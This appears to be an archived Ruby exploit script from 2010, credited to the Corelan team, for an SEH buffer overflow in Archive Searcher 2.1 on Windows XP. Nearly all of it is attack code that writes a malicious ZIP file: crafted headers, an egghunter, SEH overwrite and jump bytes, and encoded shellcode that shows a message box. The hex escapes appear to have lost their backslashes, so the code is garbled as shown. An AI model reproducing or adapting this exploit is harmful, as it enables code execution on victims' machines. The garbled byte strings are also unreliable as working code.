Home / os / win7

archive_searcher.rb.txt

Posted on 17 April 2010

#!/usr/bin/ruby
# Software      : Archive Searcher 2.1
# Author        : Lincoln
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Search for file in application, ex: point to desktop and click seach now
# Character restrictions, upper case alpha converted, A -> a etc.
#
#
banner =
"|------------------------------------------------------------------|
" +
"|                         __               __                      |
" +
"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
" +
"|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
" +
"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
" +
"| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
" +
"|                                                                  |
" +
"|                                       http://www.corelan.be:8800 |
" +
"|                                                                  |
" +
"|-------------------------------------------------[ EIP Hunters ]--|

"

print banner
puts "[+] Exploit for Archive Searcher 2.1"

#Zip Headers
header1=
"x50x4bx03x04x14x00x00x00" +
"x00x00xb7xacxcex34x00x00" +
"x00x00x00x00x00x00x00x00" +
"x00xe4x0fx00x00x00"

header2=
"x50x4bx01x02x14x00x14x00" +
"x00x00x00x00xb7xacxcex34" +
"x00x00x00x00x00x00x00x00" +
"x00x00x00x00xe4x0fx00x00" +
"x00x00x00x00x01x00x24x00" +
"x00x00x00x00x00x00"

header3=
"x50x4Bx05x06x00x00x00x00" +
"x01x00x01x00x12x10x00x00" +
"x02x10x00x00x00x00"

#Align regs # jmp esi # jmp to egg
align=
"x90x90xebx3bx90x90x90x61" +
"x61x61x61x61x61x61x61x61" +
"x61x61x61x61x61x61x61x61" +
"x61x61x61x61x61x61x61x61" +
"x61x61x61x61x61x61x61x61" +
"x61x61x61x61x61x61x61x61" +
"x61x61x61x61x61x61x61x61" +
"x5ex5ex5ex5ex5exffxe6"

#modified egghunter, mov edx,esi
egg =
"x89xf2x42x52x6ax02x58xcd" +
"x2ex3cx05x5ax74xefxb8x77" +
"x30x30x74x8Bxfaxafx75xea" +
"xafx75xe7xffxe7"


#msgbox: "Exploited by Corelan Security Team"
shellcode =
"w00tw00t" +
"x89xe3xdaxd7xd9x73xf4x59x49x49x49x49x49x49" +
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" +
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" +
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" +
"x75x4ax49x4ax79x4ax4bx4dx4bx4bx69x51x64x45" +
"x74x4ax54x45x61x4ex32x4ex52x42x5ax46x51x49" +
"x59x42x44x4ex6bx51x61x44x70x4cx4bx43x46x44" +
"x4cx4ex6bx42x56x47x6cx4cx4bx51x56x44x48x4c" +
"x4bx51x6ex45x70x4ex6bx45x66x50x38x50x4fx47" +
"x68x50x75x4cx33x50x59x45x51x4bx61x4bx4fx48" +
"x61x51x70x4cx4bx50x6cx46x44x45x74x4cx4bx51" +
"x55x47x4cx4cx4bx50x54x43x35x50x78x43x31x4b" +
"x5ax4cx4bx42x6ax47x68x4ex6bx43x6ax47x50x45" +
"x51x4ax4bx48x63x46x57x50x49x4ex6bx44x74x4c" +
"x4bx45x51x4ax4ex44x71x49x6fx50x31x4bx70x4b" +
"x4cx4ex4cx4fx74x4bx70x43x44x46x6ax4ax61x4a" +
"x6fx44x4dx47x71x4bx77x48x69x4ax51x4bx4fx49" +
"x6fx49x6fx45x6bx43x4cx45x74x51x38x51x65x49" +
"x4ex4ex6bx42x7ax45x74x45x51x4ax4bx43x56x4e" +
"x6bx46x6cx42x6bx4cx4bx43x6ax45x4cx43x31x4a" +
"x4bx4ex6bx45x54x4ex6bx47x71x4dx38x4fx79x51" +
"x54x46x44x47x6cx45x31x4ax63x4fx42x44x48x46" +
"x49x48x54x4fx79x4bx55x4dx59x49x52x50x68x4c" +
"x4ex50x4ex44x4ex48x6cx50x52x4bx58x4dx4cx4b" +
"x4fx49x6fx4bx4fx4fx79x51x55x46x64x4dx6bx51" +
"x6ex49x48x4dx32x51x63x4cx47x45x4cx44x64x51" +
"x42x4dx38x4ex6bx49x6fx49x6fx4bx4fx4cx49x42" +
"x65x47x78x43x58x42x4cx50x6cx45x70x4bx4fx51" +
"x78x47x43x45x62x46x4ex45x34x45x38x51x65x51" +
"x63x45x35x44x32x4dx58x51x4cx44x64x44x4ax4c" +
"x49x48x66x43x66x4bx4fx43x65x46x64x4cx49x4b" +
"x72x50x50x4dx6bx4ex48x4cx62x50x4dx4dx6cx4e" +
"x67x47x6cx47x54x46x32x4bx58x43x6ex49x6fx49" +
"x6fx49x6fx42x48x51x74x45x71x51x48x45x70x43" +
"x58x44x30x43x47x42x4ex42x45x44x71x4bx6bx4b" +
"x38x43x6cx45x74x46x66x4bx39x48x63x45x38x50" +
"x61x42x4dx50x58x45x70x51x78x42x59x45x70x50" +
"x54x51x75x51x78x44x35x43x42x50x69x51x64x43" +
"x58x51x30x43x63x45x35x43x53x51x78x42x45x42" +
"x4cx50x61x50x6ex42x48x51x30x51x53x50x6fx50" +
"x72x45x38x43x54x51x30x50x62x43x49x51x78x42" +
"x4fx43x59x42x54x50x65x51x78x42x65x51x68x42" +
"x50x50x6cx46x51x48x49x4ex68x50x4cx46x44x45" +
"x72x4dx59x49x71x44x71x4ax72x43x62x43x63x50" +
"x51x46x32x4bx4fx48x50x50x31x4fx30x46x30x4b" +
"x4fx51x45x44x48x45x5ax41x41"

size = 4064
junk = "x90" * (267 - (align.length + egg.length))

jseh = "xe9xf7xfexffxff" #jmp back to popad's
nseh = "xebxf9x90x90" #jmp back to near jump
seh  = "x0cx14x40x00" #universal

payload = align + egg + junk + jseh + nseh + seh + shellcode
rest = "D" * (size - payload.length)
final = payload + rest + ".txt"

filename = "search.zip"
f = File.new(filename, 'w')
f.write header1 + final + header2 + final + header3
f.close

puts "[+] file size :  #{final.length}"
puts "[+] Wrote exploit file : #{filename}"
puts "[+] Search for zip and boom!

"

 

TOP